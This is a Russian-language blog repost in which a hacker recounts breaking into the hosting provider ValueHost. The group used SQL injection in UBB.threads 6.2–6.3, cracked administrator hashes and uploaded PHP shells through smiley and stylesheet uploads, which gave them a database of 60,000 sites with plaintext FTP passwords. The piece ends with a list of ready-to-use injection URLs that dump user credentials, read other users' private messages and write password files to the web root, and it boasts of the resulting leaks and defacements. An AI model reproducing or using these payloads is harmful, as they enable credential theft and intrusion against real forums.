Обновления в формате RSS 2.0
Трансляция в LiveJournal.com
Читать в ленте Яндекса
Как был взломан ValueHost
Уже как несколько месяцев весь рунет стоит на ушах из-за того, что один из самый известных русских хостеров (valuehost) был взломан. Сейчас я вам расскажу как всё было… Всё произошло примерно пол года назад. Как-то в один прекрасный день мы узнали, что один из мемберов нашей тимы (w00t) нашёл уязвимость в форуме UBB.threads 6.2.*-6.3.*. Это была обычная инъекция, которой за считанные секунды можно было получить хеши всех администраторов и пользователей форума.
Вот и сама уязвимость, которая принесла большие траблы админам валуе =) (Все респекты Вут’у =) (багу мы выкладывали на паре известных форумов, но это была самая грубая ошибка, некоторые личности ей и увели базу, что привело к масс дефейсу известных русских сайтов и раздаче базы «кому попало») :
http://urlubb.com/showmembers.php?Cat=&like= 1’%20union%20SELECT%20U_LoginName,U_Registered, U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_ Number%20FROM%20w3t_Users%20WHERE% 20U_Status=’Administrator’/*
После того, как мы увидели хеши админов форума в кодировке MD5, в дело пошёл обычный брутфорсер. Оказалось, что админы зачем-то зарегали 5 админов, причём появлялись на форуме максимум 1-2. Ещё они не дружат со сложными пассами :) За час мы расшифровали парочку админских пассов (помнится мне, что у одного был пароль 1234567890 %). По началу казалось, что это ничего не даст, так как админы таких крупных хостеров не ламоразмы и прав на запись не оставляют, но эти оказались особыми :) Права на запись смайлов были не прикрыты /images/icons/. В результате в админке форума был залит php шелл через смайлик. Как вы понимаете, валуехост оставалось недолго жить на свете… =)
Пару ночей мы рылись в исходниках и изучали прелести валуехоста :) В конфиге достали пароль от главной базы. Далее залили на валуе скрипт для просмотра БД и спокойно вошли в неё. Там нас ожидало очень много интересного. FTP пассы в открытом виде, инфа владельцев доменов и разная прочая фигня лежала в огромной базе с 60.000 сайтами.
Прошло полгода, доступ к базе был у нас до сих пор! Некоторые личности приобретшие базу начали раздавать её и появлялось множество якобы «дефейсов» кульных сайтов. Поступало много звонков к админам, что вот их отымели, но сперва они думали, что это полный бред и отвечали по телефону: «Взлом нашего сервера невозможен, это исключено».
Как-то раз после учёбы вечерком сожусь за комп и от одного из мемберов узнаю, что админы вышли из долгой спячки (которая длилась пол года) и поприкрывали всё нахрен.
Лично я был немного рад, что наконец-то прекратятся эти бесконечные «дефейсы», но всё равно в душе было немного жалко потерять доступ к такой огромной БД ;).
И тут мы разгорелись желанием всё-таки вернуть эту базу, не для дефейсов, не для продажи, а для интереса. Valuehost были как всегда на высоте в своей тупизне ). Инъекцию на форуме они не прикрыли, а просто снесли все наши «потайные ходы (шеллы, нужные инструменты =)) и убрали права на запись в /icons/… После двух часов расшифровки очередных админских хешей форума мы нашли ещё одного «любителя маленьких паролей».
Очередной раз мы в админке, через смайл шелл залить нельзя, пишет права нету у тебя, тут в админке UBB я нашёл ещё одну мазу — добавлять стили или редактировать их. Админы прикрыли права на /icons/, а /stylesheets/ прикрыть они не догадались (просто добавлять или редактировать стили форума и делать шелл). После 15 минут смеха мы опять каким-то макаром лазали по базе как по своей :)… Но не всё так радостно. Через несколько дней все наши шеллы поприкрывали и самое главное — их форум UBB был снесён окончательно. ИМХО главный директор ВалуеХост открыл глаза и выгнал этих недоумков с работы, нанял умных людей. Пусть это служит уроком для администраторов серваков, которые любят поставить на свой ресурс что-то публичное вместо того, что бы посидеть и написать свой двиг, чьи сорцы будут никому неизвестны :). Ну а насчёт паролей тут уже говорить нечего, ставить на такой умопомрачительный хостер 5-значный пасс просто ЛОЛ…
Ну а вот все уязвимости UBB.threads 6.2.*-6.3.* найденными нами:
1. Выводим логины и хеши паролей всех юзеров…
http://forum.ru/showmembers.php?Cat=&like= 1’%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users/*
http://forum.ru/showmembers.php?Cat=&like= 1’%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users where U_Status=’Administrator’/*
Выводим пассы всех админов… Заменяем Administrator на Moderator и получаем тоже тока для модеров….
2. Читаем чужие приваты…
http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number= ТУТ ПИШЕМ НОМЕР ПРИВАТА КОТОРЫЙ ХОТИМ ПОЧИТАТЬ/*
Например:
http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number=3/*
3. Пишем все логины с паролями в файл на серваке:
http://forum.ru/viewmessage.php?Cat=&message= 999999999%20union%20select%20U_LoginName, 0,0,0,0,U_Password%20from%20w3t_Users% 20where%201=1%20into%20outfile%20’/ПУТЬ ДО ФОРУМА/images/icons/info.txt’/*
Путь можно узнать так: http://31337.org/showmembers.php?Cat=&like=0’ — вылезет ошибка и там видно путь…
4. Получаем список логинов всех юзеров..
http://forum.ru/showflat.php?Cat=&Number =999999%20union%20select%200,U_Login Name%20from%20w3t_Users%20where%2 01=1%20into%20outfile%20’ /var/www/html/forum/images/icons/info1.txt’
Меняем U_LoginName на U_Password, info1.txt на info2.txt и в файле info2.txt получаем пасы всех юзеров… Примерно так:
http://forum.ru/images/icons/info2.txt
P. S. Иногда надо регаться чтобы бага прокатила, а иногда не надо… Всё зависит от настроек форума..
Взято с www.cyberlords.net
Постоянный адрес этой страницы: http://sopov.ru/pj/valuehost/articles/11/
Copyright © 2003, 2005 valuehost.pp.ru, valuehost.info, Вся правда о ValueHost.
Этот раздел сайта имеет в своем название слово «Valuehost» (Торговая марка